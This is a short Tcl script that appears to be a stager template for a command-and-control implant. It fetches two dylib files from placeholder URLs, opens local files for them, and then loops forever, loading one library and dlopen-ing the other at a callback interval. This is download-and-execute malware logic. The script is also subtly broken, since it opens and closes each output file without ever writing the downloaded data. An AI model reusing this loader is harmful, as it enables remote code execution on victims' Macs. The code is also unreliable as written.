package require http
package require tls

http::register https 443 tls::socket
set url URLDLOPEN
set token [http::geturl $url -timeout 30000 -binary 1]
set status [http::status $token]
set answer [http::data $token]
http::cleanup $token
http::unregister https

set outputFile [open dlopen.dylib wb]

close $outputFile

http::register https 443 tls::socket
set url URLAPFELLDYLIB
set token [http::geturl $url -timeout 30000 -binary 0]
set status [http::status $token]
set answer [http::data $token]
http::cleanup $token
http::unregister https


set outputFile [open tclconfig.dylib wb]



close $outputFile
set here [pwd]
set dl ${here}/dlopen.dylib
set yourlib ${here}/tclconfig.dylib
set cb callback_time
while True {
  load $dl
  dlopen $yourlib
  after ${cb}000
}